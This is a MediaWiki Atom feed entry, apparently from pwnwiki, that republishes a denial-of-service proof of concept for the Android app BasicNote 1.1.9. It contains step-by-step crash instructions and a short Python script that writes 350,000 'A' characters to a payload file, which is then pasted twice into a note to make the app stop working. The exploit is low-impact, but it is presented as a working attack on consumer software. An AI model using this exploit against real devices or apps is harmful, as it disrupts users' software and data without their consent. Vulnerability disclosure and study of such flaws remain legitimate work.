<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=BasicNote_1.1.9_%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E</id>
	<title>BasicNote 1.1.9 拒絕服務漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=BasicNote_1.1.9_%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=BasicNote_1.1.9_%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-07T23:57:34Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=BasicNote_1.1.9_%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E&amp;diff=3923&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==POC== &lt;pre&gt; # Exploit Title: BasicNote 1.1.9 - Denial of Service (PoC) # Date: 2021-06-02 # Author: Brian Rodríguez # Download Link: https://play.google.com/store/apps/deta...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=BasicNote_1.1.9_%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E&amp;diff=3923&amp;oldid=prev"/>
		<updated>2021-06-03T11:59:40Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==POC== &amp;lt;pre&amp;gt; # Exploit Title: BasicNote 1.1.9 - Denial of Service (PoC) # Date: 2021-06-02 # Author: Brian Rodríguez # Download Link: https://play.google.com/store/apps/deta...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==POC==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: BasicNote 1.1.9 - Denial of Service (PoC)&lt;br /&gt;
# Date: 2021-06-02&lt;br /&gt;
# Author: Brian Rodríguez&lt;br /&gt;
# Download Link: https://play.google.com/store/apps/details?id=notizen.basic.notes.notas.note.notepad&amp;amp;hl=es_MX&lt;br /&gt;
# Version: 1.1.9&lt;br /&gt;
# Category: DoS (Android)&lt;br /&gt;
&lt;br /&gt;
##### Vulnerability #####&lt;br /&gt;
&lt;br /&gt;
BasicNote - Notas, Bloc de notas is vulnerable to a DoS condition when two long lists of characters are being used when creating a note:&lt;br /&gt;
&lt;br /&gt;
# STEPS #&lt;br /&gt;
# Open the program&lt;br /&gt;
# Create a new Note.&lt;br /&gt;
# Run the python exploit script payload.py, it will create a new payload.txt file&lt;br /&gt;
# Copy the content of the file &amp;quot;payload.txt&amp;quot;&lt;br /&gt;
# Paste the content from payload.txt twice in the new Note.&lt;br /&gt;
# Crashed&lt;br /&gt;
&lt;br /&gt;
Successful exploitation will causes application stop working.&lt;br /&gt;
&lt;br /&gt;
I have been able to test this exploit against Android 8.0.&lt;br /&gt;
&lt;br /&gt;
##### PoC #####&lt;br /&gt;
&lt;br /&gt;
#!/usr/bin/env python&lt;br /&gt;
buffer = &amp;quot;\x41&amp;quot; * 350000&lt;br /&gt;
&lt;br /&gt;
try:&lt;br /&gt;
    f = open(&amp;quot;payload.txt&amp;quot;,&amp;quot;w&amp;quot;)&lt;br /&gt;
    f.write(buffer)&lt;br /&gt;
    f.close()&lt;br /&gt;
    print (&amp;quot;File created&amp;quot;)&lt;br /&gt;
except:&lt;br /&gt;
    print (&amp;quot;File cannot be created&amp;quot;)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>